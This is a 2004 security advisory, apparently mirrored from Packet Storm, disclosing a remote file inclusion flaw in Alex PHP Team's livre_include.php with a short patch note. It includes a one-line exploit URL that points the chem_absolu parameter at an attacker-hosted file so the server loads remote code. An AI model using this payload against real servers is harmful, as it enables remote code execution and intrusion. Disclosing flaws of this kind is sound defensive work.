Lucene search

K

alexPHP.txt

🗓️ 01 Oct 2004 00:00:00Reported by Nourredine Himeur aka LostNoobsType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 45 Views

PHP file inclusion vulnerability on Alex PHP Team website, fix variable to secure.

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`  
  
Informations :   
°°°°°°°°°°°°°°   
Website : http://www.alexphpteam.com  
Version : all  
Problem : Include file   
  
  
  
PHP Code/Location :   
°°°°°°°°°°°°°°°°°°°   
./include/livre_include.php  
  
------------------------------------------------------------------   
if (!$no_connect).... some include() functions  
------------------------------------------------------------------   
  
Exploit :   
°°°°°°°°°   
http://[target]/include/livre_include.php?no_connect=lol&chem_absolu=http://[attacker]/file.ext%3f  
  
  
Patch :   
°°°°°°°   
You must to fix the variable $chem_absolu.  
  
  
Nourredine Himeur aka LostNoobs  
  
"I'm looking for a job in France"  
you can see my curriculum vitae   
on www.security-challenge.com/delires/  
  
#s-c on irc.fr.worldnet.net  
www.security-challenge.com  
www.hacklink.net  
www.opensavoir.com  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
01 Oct 2004 00:00Current
7.4High risk
Vulners AI Score7.4
45
.json
Report